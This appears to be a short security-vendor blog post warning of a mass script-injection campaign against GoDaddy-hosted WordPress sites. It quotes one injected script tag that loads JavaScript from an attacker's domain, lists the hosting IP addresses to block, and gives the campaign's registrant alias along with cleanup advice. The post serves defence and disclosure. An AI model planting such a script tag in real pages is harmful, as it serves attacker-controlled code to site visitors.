For the last few days we’ve tracking another large scale attack against GoDaddy shared-hosted sites. GoDaddy has been a target for a while, with mass infections happening often.
<script src= "http://acrossuniverseitbenet.com/js.php?kk=10″></script>
All of them hosted at 18.104.22.168 and 22.214.171.124. If you are a hosting provider, please make sure to block those IP addresses and domains (none of them are currently blacklisted).
As far as who’s is behind this attack, it seems the same group as the previous attackes. They’ve changed their name to Hilary Buff instead of Hilary Kneber.
Hilary Buff firstname.lastname@example.org
56764545 fax: 56764545
29/2 Sun street. Montey 29
London NY 45453
If your site is currently infected, you have to remove these malicious entries from every post (just log to wp-admin to do so).
If you need help doing so, please contact us at email@example.com or visit our site Sucuri Security. We can get you cleaned up pretty quickly.